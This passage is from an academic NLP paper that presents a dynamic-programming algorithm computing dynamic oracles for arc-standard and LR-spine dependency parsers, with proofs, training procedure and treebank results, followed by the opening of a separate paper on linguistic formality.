decomposable. To see why, consider a configura- tion with stack σ = [i,j,k]. Consider also arc set A = {(i,j), (i,k)}. The arc (i,j) can be derived through the transition sequence ra, ra, and the arc (i,k) can be derived through the alternative trans- ition sequence la, ra. Yet, it is easy to see that a con- figuration containing both arcs cannot be reached. As we cannot rely on the arc decomposition prop- erty, in order to derive a dynamic oracle for the arc- standard model we need to develop more sophistic- ated techniques which take into account the interac- tion among the applied transitions. 3 Configuration Loss and Dynamic Oracles We aim to derive a dynamic oracle for the arc-stand- ard (and related) system. This is a function that takes a configuration c and a gold tree tG and returns a set of transitions that are “optimal” for c with respect to tG. As already mentioned in the introduction, a dynamic oracle can be used to improve training of greedy transition-based parsers. In this section we provide a formal definition for a dynamic oracle. Let t1 and t2 be two dependency trees over the same string w, with arc sets A1 and A2, respectively. We define the loss of t1 with respect to t2 as L(t1, t2) = |A1 \A2| . (1) Note that L(t1, t2) = L(t2, t1), since |A1| = |A2|. Furthermore L(t1, t2) = 0 if and only if t1 and t2 are the same tree. Let c be a configuration of our parser relative to input string w. We write D(c) to denote the set of all dependency trees that can be obtained in a com- putation of the form c `∗ cf , where cf is some final configuration. We extend the loss function in (1) to configurations by letting L(c,t2) = min t1∈D(c) L(t1, t2) . (2) Assume some reference (desired) dependency tree tG for w, which we call the gold tree. Quantity L(c,tG) can be used to compute a dynamic oracle relating a parser configuration c to a set of optimal actions by setting oracle(c,tG) = {τ | L(τ(c), tG) −L(c,tG) = 0} . (3) 121 We therefore need to develop an algorithm for com- puting (2). We will do this first for the arc-standard parser, and then for an extension of this model. Notation We also apply the loss function L(t,tG) in (1) when t is a dependency tree for a substring of w. In this case the nodes of t are a subset of the nodes of tG, and L(t,tG) provides a count of the nodes of t that are assigned a wrong head node, when tG is considered as the reference tree. 4 Main Algorithm Throughout this section we assume an arc-standard parser. Our algorithm takes as input a projective gold tree tG and a configuration c = (σL,β,A). We call σL the left stack, in contrast with a right stack whose construction is specified below. 4.1 Basic Idea The algorithm consists of two steps. Informally, in the first step we compute the largest subtrees, called here tree fragments, of the gold tree tG that have their span entirely included in the buffer β. The root nodes of these tree fragments are then arranged into a stack data structure, according to the order in which they appear in β and with the leftmost root in β being the topmost element of the stack. We call this structure the right stack σR. Intuitively, σR can be viewed as the result of pre-computing β by ap- plying all sequences of transitions that match tG and that can be performed independently of the stack in the input configuration c, that is, σL. In the second step of the algorithm we use dy- namic programming techniques to simulate all com- putations of the arc-standard parser starting in a con- figuration with stack σL and with a buffer consisting of σR, with the topmost token of σR being the first token of the buffer. As we will see later, the search space defined by these computations includes the de- pendency trees for w that are reachable from the in- put configuration c and that have minimum loss. We then perform a Viterbi search to pick up such value. The second step is very similar to standard imple- mentations of the CKY parser for context-free gram- mars (Hopcroft and Ullman, 1979), running on an input string obtained as the concatenation of σL and σR. The main difference is that we restrict ourselves to parse only those constituents in σLσR that dom- inate the topmost element of σL (the rightmost ele- ment, if σL is viewed as a string). In this way, we ac- count for the additional constraint that we visit only those configurations of the arc-standard parser that can be reached from the input configuration c. For instance, this excludes the reduction of two nodes in σL that are not at the two topmost positions. This would also exclude the reduction of two nodes in σR: this is correct, since the associated tree frag- ments have been chosen as the largest such frag- ments in β. The above intuitive explanation will be made mathematically precise in §5, where the notion of linear dependency tree is introduced. 4.2 Construction of the Right Stack In the first step we process β and construct a stack σR, which we call the right stack associated with c and tG. Each node of σR is the root of a tree t which satisfies the following properties • t is a tree fragment of the gold tree tG having span entirely included in the buffer β; • t is bottom-up complete for tG, meaning that for each node i of t different from t’s root, the dependents of i in tG cannot be in σL; • t is maximal for tG, meaning that every super- tree of t in tG violates the above conditions. The stack σR is incrementally constructed by pro- cessig β from left to right. Each node i is copied into σR if it satisfies any of the following conditions • the parent node of i in tG is not in β; • some dependent of i in tG is in σL or has already been inserted in σR. It is not difficult to see that the nodes in σR are the roots of tree fragments of tG that satisfy the condi- tion of bottom-up completeness and the condition of maximality defined above. 4.3 Computation of Configuration Loss We start with some notation. Let `L = |σL| and `R = |σR|. We write σL[i] to denote the i-th ele- ment of σL and t(σL[i]) to denote the correspond- ing tree fragment; σR[i] and t(σR[i]) have a similar meaning. In order to simplify the specification of the algorithm, we assume below that σL[1] = σR[1]. 122 Algorithm 1 Computation of the loss function for the arc-standard parser 1: T [1, 1](σL[1]) ←L(t(σL[1]), tG) 2: for d ← 1 to `L + `R − 1 do . d is the index of a sub-anti-diagonal 3: for j ← max{1,d− `L + 1} to min{d,`R} do . j is the column index 4: i ← d− j + 1 . i is the row index 5: if i < `L then . expand to the left 6: for each h ∈ ∆i,j do 7: T [i + 1,j](h) ← min{T [i + 1,j](h), T [i,j](h) + δG(h → σL[i + 1])} 8: T [i + 1,j](σL[i + 1]) ← min{T [i + 1,j](σL[i + 1]), T [i,j](h) + δG(σL[i + 1] → h)} 9: if j < `R then . expand to the right 10: for each h ∈ ∆i,j do 11: T [i,j + 1](h) ← min{T [i,j + 1](h), T [i,j](h) + δG(h → σR[j + 1])} 12: T [i,j + 1](σR[j + 1]) ← min{T [i,j + 1](σR[j + 1]),T [i,j](h) +δG(σR[j + 1] → h)} 13: return T [`L,`R](0) + ∑ i∈[1,`L] L(t(σL[i]), tG) Therefore the elements of σR which have been con- structed in §4.2 are σR[i], i ∈ [2,`R]. Algorithm 1 uses a two-dimensional array T of size `L × `R, where each entry T [i,j] is an as- sociation list from integers to integers. An entry T [i,j](h) stores the minimum loss among depend- ency trees rooted at h that can be obtained by run- ning the parser on the first i elements of stack σL and the first j elements of buffer σR. More precisely, let ∆i,j = {σL[k] | k ∈ [1, i]}∪ {σR[k] | k ∈ [1,j]} . (4) For each h ∈ ∆i,j, the entry T [i,j](h) is the minimum loss among all dependency trees defined as above and with root h. We also assume that T [i,j](h) is initialized to +∞ (not reported in the algorithm). Algorithm 1 starts at the top-left corner of T , vis- iting each individual sub-anti-diagonal of T in as- cending order, and eventually reaching the bottom- right corner of the array. For each entry T [i,j], the left expansion is considered (lines 5 to 8) by com- bining with tree fragment σL[i + 1], through a left or a right arc reduction. This results in the update of T [i + 1,j](h), for each h ∈ ∆i+1,j, whenever a smaller value of the loss is achieved for a tree with root h. The Kronecker-like function used at line 8 provides the contribution of each single arc to the loss of the current tree. Denoting with AG the set of arcs of tG, such a function is defined as δG(i → j) = { 0, if (i → j) ∈ AG; 1, otherwise. (5) A symmetrical process is implemented for the right expansion of T [i,j] through tree fragment σR[j + 1] (lines 9 to 12). As we will see in the next section, quantity T [`L,`R](0) is the minimal loss of a tree composed only by arcs that connect nodes in σL and σR. By summing the loss of all tree fragments t(σL[i]) to the loss in T [`L,`R](0), at line 13, we obtain the desired result, since the loss of each tree fragment t(σR[j]) is zero. 5 Formal Properties Throughout this section we let w, tG, σL, σR and c = (σL,β,A) be defined as in §4, but we no longer assume that σL[1] = σR[1]. To simplify the present- ation, we sometimes identify the tokens in w with the associated nodes in a dependency tree for w. 5.1 Linear Trees Algorithm 1 explores all dependency trees that can be reached by an arc-standard parser from configur- ation c, under the condition that (i) the nodes in the buffer β are pre-computed into tree fragments and collapsed into their root nodes in the right stack σR, and (ii) nodes in σR cannot be combined together prior to their combination with other nodes in the left stack σL. This set of dependency trees is char- 123 j4 i6 i5 i3 j5 i4 i1 j3 i2 j1 j2 σRσL Figure 2: A possible linear tree for string pair (σL,σR), where σL = i6i5i4i3i2i1 and σR = j1j2j3j4j5. The spine of the tree consists of nodes j4, i3 and i1. acterized here using the notion of linear tree, to be used later in the correctness proof. Consider two nodes σL[i] and σL[j] with j > i > 1. An arc-standard parser can construct an arc between σL[i] and σL[j], in any direction, only after reaching a configuration in which σL[i] is at the top of the stack and σL[j] is at the second topmost posi- tion. In such configuration we have that σL[i] dom- inates σL[1]. Furthermore, consider nodes σR[i] and σR[j] with j > i ≥ 1. Since we are assuming that tree fragments t(σR[i]) and t(σR[j]) are bottom-up complete and maximal, as defined in §4.2, we allow the construction of an arc between σR[i] and σR[j], in any direction, only after reaching a configuration in which σR[i] dominates node σL[1]. The dependency trees satisfying the restrictions above are captured by the following definition. A linear tree over (σL,σR) is a projective dependency tree t for string σLσR satisfying both of the addi- tional conditions reported below. The path from t’s root to node σL[1] is called the spine of t. • Every node of t not in the spine is a dependent of some node in the spine. • For each arc i → j in t with j in the spine, no dependent of i can be placed in between i and j within string σLσR. An example of a linear tree is depicted in Figure 2. Observe that the second condition above forbids the reduction of two nodes i and j, in case none of these dominates node σL[1]. For instance, the ra reduc- tion of nodes i3 and i2 would result in arc i3 → i2 replacing arc i1 → i2 in Figure 2. The new depend- ency tree is not linear, because of a violation of the second condition above. Similarly, the la reduction of nodes j3 and j4 would result in arc j4 → j3 re- placing arc i3 → j3 in Figure 2, again a violation of the second condition above. Lemma 1 Any tree t ∈ D(c) can be decomposed into trees t(σL[i]), i ∈ [1,`L], trees tj, j ∈ [1,q] and q ≥ 1, and a linear tree tl over (σL,σR,t), where σR,t = r1 · · ·rq and each rj is the root node of tj. 2 PROOF (SKETCH) Trees t(σL[i]) are common to every tree in D(c), since the arc-standard model can not undo the arcs already built in the current con- figuration c. Similar to the construction in §4.2 of the right stack σR from tG, we let tj, j ∈ [1,q], be tree fragments of t that cover only nodes associated with the tokens in the buffer β and that are bottom- up complete and maximal for t. These trees are in- dexed according to their left to right order in β. Fi- nally, tl is implicitly defined by all arcs of t that are not in trees t(σL[i]) and tj. It is not difficult to see that tl has a spine ending with node σL[1] and is a linear tree over (σL,σR,t). � 5.2 Correctness Our proof of correctness for Algorithm 1 is based on a specific dependency tree t∗ for w, which we define below. Let SL = {σL[i] | i ∈ [1,`L]} and let DL be the set of nodes that are descendants of some node in SL. Similarly, let SR = {σR[i] | i ∈ [1,`R]} and let DR be the set of descendants of nodes in SR. Note that sets SL,SR,DL and DR provide a partition of Vw. We choose any linear tree t∗l over (σL,σR) having root 0, such that L(t∗l , tG) = mintL(t,tG), where t ranges over all possible linear trees over (σL,σR) with root 0. Tree t∗ consists of the set of nodes Vw and the set of arcs obtained as the union of the set of arcs of t∗l and the set of arcs of all trees t(σL[i]), i ∈ [1,`L], and t(σR[j]), j ∈ [1,`R]. Lemma 2 t∗ ∈D(c). 2 PROOF (SKETCH) All tree fragments t(σL[i]) have already been parsed and are available in the stack associated with c. Each tree fragment t(σR[j]) can later be constructed in the computation, when a con- figuration c′ is reached with the relevant segment of w at the start of the buffer. Note also that parsing of t(σR[j]) can be done in a way that does not depend on the content of the stack in c′. 124 Finally, the parsing of the tree fragments t(σR[j]) is interleaved with the construction of the arcs from the linear tree t∗l , which are all of the form (i → j) with i,j ∈ (SL ∪ SR). More precisely, if (i → j) is an arc from t∗l , at some point in the computation nodes i and j will become available at the two top- most positions in the stack. This follows from the second condition in the definition of linear tree. � We now show that tree t∗ is “optimal” within the set D(c) and with respect to tG. Lemma 3 L(t∗, tG) = L(c,tG). 2 PROOF Consider an arbitrary tree t ∈ D(c). As- sume the decomposition of t defined in the proof of Lemma 1, through trees t(σL[i]), i ∈ [1,`L], trees tj, j ∈ [1,q], and linear tree tl over (σL,σR,t). Recall that an arc i → j denotes an ordered pair (i,j). Let us consider the following partition for the set of arcs of any dependency tree for w A1 = (SL ∪DL) ×DL , A2 = (SR ∪DR) ×DR , A3 = (Vw ×Vw) \ (A1 ∪A2) . In what follows, we compare the losses L(t,tG) and L(t∗, tG) by separately looking into the contribution to such quantities due to the arcs in A1, A2 and A3. Note that the arcs of trees t(σL[i]) are all in A1, the arcs of trees t(σR[j]) are all in A2, and the arcs of tree t∗l are all in A3. Since t and t ∗ share trees t(σL[i]), when restricted to arcs in A1 quantities L(t,tG) and L(t∗, tG) are the same. When restric- ted to arcs in A2, quantity L(t∗, tG) is zero, by con- struction of the trees t(σR[j]). Thus L(t,tG) can not be smaller than L(t∗, tG) for these arcs. The difficult part is the comparison of the contribution to L(t,tG) and L(t∗, tG) due to the arcs in A3. We deal with this below. Let AS,G be the set of all arcs from tG that are also in set (SL ×SR) ∪ (SR ×SL). In words, AS,G rep- resents gold arcs connecting nodes in SL and nodes in SR, in any direction. Within tree t, these arcs can only be found in the tl component, since nodes in SL are all placed within the spine of tl, or else at the left of that spine. Let us consider an arc (j → i) ∈ AS,G with j ∈ SL and i ∈ SR, and let us assume that (j → i) is in t∗l . If token ai does not occur in σR,t, node i is not in tl and (j → i) can not be an arc of t. We then have that (j → i) contributes one unit to L(t,tG) but does not contribute to L(t∗, tG). Similarly, let (i → j) ∈ AS,G be such that i ∈ SR and j ∈ SL, and assume that (i → j) is in t∗l . If token ai does not occur in σR,t, arc (i → j) can not be in t. We then have that (i → j) contributes one unit to L(t,tG) but does not contribute to L(t∗, tG). Intuitively, the above observations mean that the winning strategy for trees in D(c) is to move nodes from SR as much as possible into the linear tree component tl, in order to make it possible for these nodes to connect to nodes in SL, in any direction. In this case, arcs from A3 will also move into the linear tree component of a tree in D(c), as it happens in the case of t∗. We thus conclude that, when restricted to the set of arcs in A3, quantity L(t,tG) is not smal- ler than L(t∗, tG), because stack σR has at least as many tokens corresponding to nodes in SR as stack σR,t, and because t∗l has the minimum loss among all the linear trees over (σL,σR). Putting all of the above observations together, we conclude that L(t,tG) can not be smaller than L(t∗, tG). This concludes the proof, since t has been arbitrarily chosen in D(c). � Theorem 1 Algorithm 1 computes L(c,tG). 2 PROOF (SKETCH) Algorithm 1 implements a Vi- terbi search for trees with smallest loss among all linear trees over (σL,σR). Thus T [`L,`R](0) = L(t∗l , tG). The loss of the tree fragments t(σR[j]) is 0 and the loss of the tree fragments t(σL[i]) is ad- ded at line 13 in the algorithm. Thus the algorithm returns L(t∗, tG), and the statement follows from Lemma 2 and Lemma 3. � 5.3 Computational Analysis Following §4.2, the right stack σR can be easily constructed in time O(n), n the length of the in- put string. We now analyze Algorithm 1. For each entry T [i,j] and for each h ∈ ∆i,j, we update T [i,j](h) a number of times bounded by a con- stant which does not depend on the input. Each up- dating can be computed in constant time as well. We thus conclude that Algorithm 1 runs in time O(`L · `R · (`L + `R)). Quantity `L+`R is bounded by n, but in practice the former is significantly smal- ler. When measured over the sentences in the Penn 125 Treebank, the average value of `L+`R n is 0.29. In terms of runtime, training is 2.3 times slower when using our oracle instead of a static oracle. 6 Extension to the LR-Spine Parser In this section we consider the transition-based parser proposed by Sartorio et al. (2013), called here the LR-spine parser. This parser is not arc- decomposable: the same example reported in §2.4 can be used to show this fact. We therefore extend to the LR-spine parser the algorithm developed in §4. 6.1 The LR-Spine Parser Let t be a dependency tree. The left spine of t is an ordered sequence 〈i1, . . . , ip〉, p ≥ 1, consisting of all nodes in a descending path from the root of t taking the leftmost child node at each step. The right spine of t is defined symmetrically. We use ⊕ to denote sequence concatenation. In the LR-spine parser each stack element σ[i] de- notes a partially built subtree t(σ[i]) and is represen- ted by a pair (lsi, rsi), with lsi and rsi the left and the right spine, respectively, of t(σ[i]). We write lsi[k] (rsi[k]) to represent the k-th element of lsi (rsi, re- spectively). We also write r(σ[i]) to denote the root of t(σ[i]), so that r(σ[i]) = lsi[1] = rsi[1]. Informally, the LR-spine parser uses the same transition typologies as the arc-standard parser. However, an arc (h → d) can now be created with the head node h chosen from any node in the spine of the involved tree. The transition types of the LR- spine parser are defined as follows. • Shift (sh) removes the first node from the buf- fer and pushes into the stack a new element, consisting of the left and right spines of the as- sociated tree (σ,i|β,A) `sh (σ|(〈i〉,〈i〉),β,A) . • Left-Arc k (lak) creates a new arc h → d from the k-th node in the left spine of the topmost tree in the stack to the head of the second ele- ment in the stack. Furthermore, the two top- most stack elements are replaced by a new ele- ment associated with the resulting tree (σ′|σ[2]|σ[1],β,A) `lak (σ ′|σlak,β,A∪{h → d}) where we have set h = ls1[k], d = r(σ[2]) and σlak = (〈ls1[1], . . . , ls1[k]〉⊕ ls2, rs1). • Right-Arc k (rak for short) is defined symmet- rically with respect to lak (σ′|σ[2]|σ[1],β,A) `rak (σ′|σrak,β,A∪{h → d}) where we have set h = rs2[k], d = r(σ[1]) and σrak = (ls2,〈rs2[1], . . . , rs2[k]〉⊕ rs1). Note that, at each configuration in the LR-spine parser, there are |ls1| possible lak transitions, one for each choice of a node in the left spine of t(σ[1]); similarly, there are |rs2| possible rak transitions, one for each choice of a node in the right spine of t(σ[2]). 6.2 Configuration Loss We only provide an informal description of the ex- tended algorithm here, since it is very similar to the algorithm in §4. In the first phase we use the procedure of §4.2 for the construction of the right stack σR, considering only the roots of elements in σL and ignoring the rest of the spines. The only difference is that each element σR[j] is now a pair of spines (lsR,j, rsR,j). Since tree fragment t(σR[j]) is bottom-up complete (see §4.1), we now restrict the search space in such a way that only the root node r(σR[j]) can take de- pendents. This is done by setting lsR,j = rsR,j = 〈r(σR[j])〉 for each j ∈ [1,`R]. In order to simplify the presentation we also assume σR[1] = σL[1], as done in §4.3. In the second phase we compute the loss of an in- put configuration using a two-dimensional array T , defined as in §4.3. However, because of the way transitions are defined in the LR-spine parser, we now need to distinguish tree fragments not only on the basis of their roots, but also on the basis of their left and right spines. Accordingly, we define each entry T [i,j] as an association list with keys of the form (ls, rs). More specifically, T [i,j](ls, rs) is the minimum loss of a tree with left and right spines ls and rs, respectively, that can be obtained by running the parser on the first i elements of stack σL and the first j elements of buffer σR. We follow the main idea of Algorithm 1 and ex- pand each tree in T [i,j] at its left side, by combin- ing with tree fragment t(σL[i + 1]), and at its right side, by combining with tree fragment t(σR[j + 1]). 126 Tree combination deserves some more detailed dis- cussion, reported below. We consider the combination of a tree ta from T [i,j] and tree t(σL[i + 1]) by means of a left-arc transition. All other cases are treated symmetric- ally. Let (lsa, rsa) be the spine pair of ta, so that the loss of ta is stored in T [i,j](lsa, rsa). Let also (lsb, rsb) be the spine pair of t(σL[i + 1]). In case there exists a gold arc in tG connecting a node from lsa to r(σL[i + 1]), we choose the transition lak, k ∈ [1, |lsa|], that creates such arc. In case such gold arc does not exists, we choose the transition lak with the maximum possible value of k, that is, k = |lsa|. We therefore explore only one of the several pos- sible ways of combining these two trees by means of a left-arc transition. We remark that the above strategy is safe. In fact, in case the gold arc exists, no other gold arc can ever involve the nodes of lsa eliminated by lak (see the definition in §6.1), because arcs can not cross each other. In case the gold arc does not exist, our choice of k = |lsa| guarantees that we do not eliminate any element from lsa. Once a transition lak is chosen, as described above, the reduction is performed and the spine pair (ls, rs) for the resulting tree is computed from (lsa, rsa) and (lsb, rsb), as defined in §6.1. At the same time, the loss of the resulting tree is com- puted, on the basis of the loss T [i,j](lsa, rsa), the loss of tree t(σL[i + 1]), and a Kronecker-like func- tion defined below. This loss is then used to update T [i + 1,j](ls, rs). Let ta and tb be two trees that must be combined in such a way that tb becomes the dependent of some node in one of the two spines of ta. Let also pa = (lsa, rsa) and pb = (lsb, rsb) be spine pairs for ta and tb, respectively. Recall that AG is the set of arcs of tG. The new Kronecker-like function for the computation of the loss is defined as δG(pa,pb) =    0, if r(ta) < r(tb)∧ ∃k[(rska → r(tb)) ∈ AG]; 0, if r(ta) > r(tb)∧ ∃k[(lska → r(tb)) ∈ AG]; 1, otherwise. 6.3 Efficiency Improvement The algorithm in §6.2 has an exponential behaviour. To see why, consider trees in T [i,j]. These trees are produced by the combination of trees in T [i− 1,j] with tree t(σL[i]), or by the combination of trees in T [i,j − 1] with tree t(σR[j]). Since each combin- ation involves either a left-arc or a right-arc trans- ition, we obtain a recursive relation that resolves into a number of trees in T [i,j] bounded by 4i+j−2. We introduce now two restrictions to the search space of our extended algorithm that result in a huge computational saving. For a spine s, we write N(s) to denote the set of all nodes in s. We also let ∆i,j be the set of all pairs (ls, rs) such that T [i,j](ls, rs) 6= +∞. • Every time a new pair (ls, rs) is created in ∆[i,j], we remove from ls all nodes different from the root that do not have gold dependents in {r(σL[k]) | k < i}, and we remove from rs all nodes different from the root that do not have gold dependents in {r(σR[k]) | k > j}. • A pair pa = (lsa, rsa) is removed from ∆[i,j] if there exists a pair pb = (lsb, rsb) in ∆[i,j] with the same root node as pa and with (lsa, rsa) 6= (lsb, rsb), such that N(lsa) ⊆ N(lsb), N(rsa) ⊆ N(rsb), and T [i,j](pa) ≥ T [i,j](pb). The first restriction above reduces the size of a spine by eliminating a node if it is irrelevant for the com- putation of the loss of the associated tree. The second restriction eliminates a tree ta if there is a tree tb with smaller loss than ta, such that in the computations of the parser tb provides exactly the same context as ta. It is not difficult to see that the above restrictions do not affect the correctness of the algorithm, since they always leave in our search space some tree that has optimal loss. A mathematical analysis of the computational complexity of the extended algorithm is quite in- volved. In Figure 3, we plot the worst case size of T [i,j] for each value of j + i − 1, computed over all configurations visited in the training phase (see §7). We see that |T [i,j]| grows linearly with j + i−1, leading to the same space requirements of Algorithm 1. Empirically, training with the dynamic 127 0 10 20 30 40 50 0 10 20 30 40 50 i + j − 1 m ax nu m be r of el em en ts Figure 3: Empirical worst case size of T [i,j] for each value of i + j − 1 as measured on the Penn Treebank corpus. Algorithm 2 Online training for greedy transition- based parsers 1: w ← 0 2: for k iterations do 3: shuffle(corpus) 4: for sentence w and gold tree tG in corpus do 5: c ← INITIAL(w) 6: while not FINAL(c) do 7: τp ← argmaxτ∈valid(c) w ·φ(c,τ) 8: τo ← argmaxτ∈oracle(c,tG) w·φ(c,τ) 9: if τp 6∈ oracle(c,tG) then 10: w ← w + φ(c,τo) −φ(c,τp) 11: τ ← { τp if EXPLORE τo otherwise 12: c ← τ(c) return averaged(w) oracle is only about 8 times slower than training with the oracle of Sartorio et al. (2013) without exploring incorrect configurations. 7 Training We follow the training procedure suggested by Goldberg and Nivre (2013), as described in Al- gorithm 2. The algorithm performs online learning using the averaged perceptron algorithm. A weight vector w (initialized to 0) is used to score the valid transitions in each configuration based on a feature representation φ, and the highest scoring transition τp is predicted. If the predicted transition is not optimal according to the oracle, the weights w are updated away from the predicted transition and to- wards the highest scoring oracle transition τo. The parser then moves to the next configuration, by tak- ing either the predicted or the oracle transition. In the “error exploration” mode (EXPLORE is true), the parser follows the predicted transition, and other- wise the parser follows the oracle transition. Note that the error exploration mode requires the com- pleteness property of a dynamic oracle. We consider three training conditions: static, in which the oracle is deterministic (returning a single canonical transition for each configuration) and no error exploration is performed; nondet, in which we use a nondeterministic partial oracle (Sartorio et al., 2013), but do not perform error exploration; and ex- plore in which we use the dynamic oracle and per- form error exploration. The static setup mirrors the way greedy parsers are traditionally trained. The nondet setup allows the training procedure to choose which transition to take in case of spurious ambigu- ities. The explore setup increases the configuration space explored by the parser during training, by ex- posing the training procedure to non-optimal con- figurations that are likely to occur during parsing, together with the optimal transitions to take in these configurations. It was shown by Goldberg and Nivre (2012; 2013) that the nondet setup outperforms the static setup, and that the explore setup outperforms the nondet setup. 8 Experimental Evaluation Datasets Performance evaluation is carried out on CoNLL 2007 multilingual dataset, as well as on the Penn Treebank (PTB) (Marcus et al., 1993) conver- ted to Stanford basic dependencies (De Marneffe et al., 2006). For the CoNLL datasets we use gold part-of-speech tags, while for the PTB we use auto- matically assigned tags. As usual, the PTB parser is trained on sections 2-21 and tested on section 23. Setup We train labeled versions of the arc-stand- ard (std) and LR-spine (lrs) parsers under the static, nondet and explore setups, as defined in §7. In the nondet setup we use a nondeterministic partial oracle and in the explore setup we use the non- deterministic complete oracles we present in this pa- per. In the static setup we resolve oracle ambiguities and choose a canonic transition sequence by attach- ing arcs as soon as possible. In the explore setup, 128 parser:train Arabic Basque Catalan Chinese Czech English Greek Hungarian Italian Turkish PTB UAS std:static 81.39 75.37 90.32 85.17 78.90 85.69 79.90 77.67 82.98 77.04 89.86 std:nondet 81.33 74.82 90.75 84.80 79.92 86.89 81.19 77.51 84.15 76.85 90.56 std:explore 82.56 74.39 90.95 85.65 81.01 87.70 81.85 78.72 84.37 77.21 90.92 lrs:static 81.67 76.07 91.47 84.24 77.93 86.36 79.43 76.56 84.64 77.00 90.33 lrs:nondet 83.14 75.53 91.31 84.98 80.03 88.38 81.12 76.98 85.29 77.63 91.18 lrs:explore 84.54 75.82 91.92 86.72 81.19 89.37 81.78 77.48 85.38 78.61 91.77 LAS std:static 71.93 65.64 84.90 80.35 71.39 84.60 72.25 67.66 78.77 65.90 87.56 std:nondet 71.09 65.28 85.36 80.06 71.47 85.91 73.40 67.77 80.06 65.81 88.30 std:explore 72.89 65.27 85.82 81.28 72.92 86.79 74.22 69.57 80.25 66.71 88.72 lrs:static 72.24 66.21 86.02 79.36 70.48 85.38 72.36 66.79 80.38 66.02 88.07 lrs:nondet 72.94 65.66 86.03 80.47 71.32 87.45 73.09 67.70 81.32 67.02 88.96 lrs:explore 74.54 66.91 86.83 82.38 72.72 88.44 74.04 68.76 81.50 68.06 89.53 Table 1: Scores on the CoNLL 2007 dataset (including punctuation, gold parts of speech) and on Penn Tree Bank (excluding punctuation, predicted parts of speech). Label ‘std’ refers to the arc-standard parser, and ‘lrs’ refers to the LR-spine parser. Each number is an average over 5 runs with different randomization seeds. from the first round of training onward, we always follow the predicted transition (EXPLORE is true). For all languages, we deal with non-projectivity by skipping the non-projective sentences during train- ing but not during test. For each parsing system, we use the same feature templates across all lan- guages.1 The arc-standard models are trained for 15 iterations and the LR-spine models for 30 iterations, after which all the models seem to have converged. Results In Table 1 we report the labeled (LAS) and unlabeled (UAS) attachment scores. As expec- ted, the LR-spine parsers outperform the arc-stand- ard parsers trained under the same setup. Training with the dynamic oracles is also beneficial: despite the arguable complexity of our proposed oracles, the trends are consistent with those reported by Gold- berg and Nivre (2012; 2013). For the arc-standard model we observe that the move from a static to a nondeterministic oracle during training improves the accuracy for most of languages. Making use of the completeness of the dynamic oracle and moving to the error exploring setup further improve results. The only exceptions are Basque, that has a small dataset with more than 20% of non-projective sen- tences, and Chinese. For Chinese we observe a re- duction of accuracy in the nondet setup, but an in- crease in the explore setup. For the LR-spine parser we observe a practically constant increase of performance by moving from 1Our complete code, together with the description of the fea- ture templates, is available on the second author’s homepage. the static to the nondeterministic and then to the er- ror exploring setups. 9 Conclusions We presented dynamic oracles, based on dynamic programming, for the arc-standard and the LR- spine parsers. Empirical evaluation on 10 languages showed that, despite the apparent complexity of the oracle calculation procedure, the oracles are still learnable, in the sense that using these oracles in the error exploration training algorithm presented in (Goldberg and Nivre, 2012) considerably improves the accuracy of the trained parsers. Our algorithm computes a dynamic oracle using dynamic programming to explore a forest of depend- ency trees that can be reached from a given parser configuration. For the arc-standard parser, the com- putation takes cubic time in the size of the largest of the left and right input stacks. Dynamic program- ming for the simulation of arc-standard parsers have been proposed by Kuhlmann et al. (2011). That al- gorithm could be adapted to compute minimum loss for a given configuration, but the running time is O(n4), n the size of the input string: besides being asymptotically slower by one order of magnitude, in practice n is also larger than the stack size above. Acknowledgments We wish to thank the anonym- ous reviewers. In particular, we are indebted to one of them for two important technical remarks. The third author has been partially supported by MIUR under project PRIN No. 2010LYA9RH 006. 129 References Marie-Catherine De Marneffe, Bill MacCartney, and Christopher D. Manning. 2006. Generating typed de- pendency parses from phrase structure parses. In Pro- ceedings of the 5th International Conference on Lan- guage Resources and Evaluation (LREC), volume 6, pages 449–454. Yoav Goldberg and Joakim Nivre. 2012. A dynamic or- acle for arc-eager dependency parsing. In Proc. of the 24th COLING, Mumbai, India. Yoav Goldberg and Joakim Nivre. 2013. Training deterministic parsers with non-deterministic oracles. Transactions of the association for Computational Linguistics, 1. John E. Hopcroft and Jeffrey D. Ullman. 1979. Intro- duction to Automata Theory, Languages and Compu- tation. Addison-Wesley, Reading, MA. Liang Huang and Kenji Sagae. 2010. Dynamic program- ming for linear-time incremental parsing. In Proceed- ings of the 48th Annual Meeting of the Association for Computational Linguistics, July. Marco Kuhlmann, Carlos Gómez-Rodrı́guez, and Gior- gio Satta. 2011. Dynamic programming algorithms for transition-based dependency parsers. In Proceed- ings of the 49th Annual Meeting of the Association for Computational Linguistics: Human Language Techno- logies, pages 673–682, Portland, Oregon, USA, June. Association for Computational Linguistics. Mitchell P. Marcus, Beatrice Santorini, and Mary Ann Marcinkiewicz. 1993. Building a large annotated cor- pus of english: The penn treebank. Computational Linguistics, 19(2):313–330. Joakim Nivre, Johan Hall, Sandra Kübler, Ryan McDon- ald, Jens Nilsson, Sebastian Riedel, and Deniz Yuret. 2007. The CoNLL 2007 shared task on dependency parsing. In Proceedings of EMNLP-CoNLL. Joakim Nivre. 2003. An efficient algorithm for pro- jective dependency parsing. In Proceedings of the Eighth International Workshop on Parsing Technolo- gies (IWPT), pages 149–160, Nancy, France. Joakim Nivre. 2004. Incrementality in deterministic de- pendency parsing. In Workshop on Incremental Pars- ing: Bringing Engineering and Cognition Together, pages 50–57, Barcelona, Spain. Joakim Nivre. 2008. Algorithms for deterministic incre- mental dependency parsing. Computational Linguist- ics, 34(4):513–553. Francesco Sartorio, Giorgio Satta, and Joakim Nivre. 2013. A transition-based dependency parser using a dynamic parsing strategy. In Proceedings of the 51st Annual Meeting of the Association for Computational Linguistics (Volume 1: Long Papers), pages 135–144, Sofia, Bulgaria, August. Association for Computa- tional Linguistics. Yue Zhang and Stephen Clark. 2008. A tale of two parsers: Investigating and combining graph-based and transition-based dependency parsing. In Proceedings of EMNLP. 130 work_hesivpqavbgo7bnwu55o7xw4hu ---- An Empirical Analysis of Formality in Online Communication Ellie Pavlick University of Pennsylvania∗ epavlick@seas.upenn.edu Joel Tetreault Yahoo Labs tetreaul@yahoo-inc.com Abstract This paper presents an empirical study of linguistic formality. We perform an analy- sis of humans’ perceptions of formality in four different genres. These findings are used to develop a statistical model for pre- dicting formality, which is evaluated un- der different feature settings and genres. We apply our model to an investigation of formality in online discussion forums, and present findings consistent with theories of formality and linguistic coordination. 1 Introduction Language consists of much more than just con- tent. Consider the following two sentences: 1. Those recommendations were unsolicited and undesirable. 2. that’s the stupidest suggestion EVER. Both sentences communicate the same idea, but the first is substantially more formal. Such stylistic differences often have a larger impact on how the hearer understands the sentence than the literal meaning does (Hovy, 1987). Full natural language understanding requires comprehending this stylistic 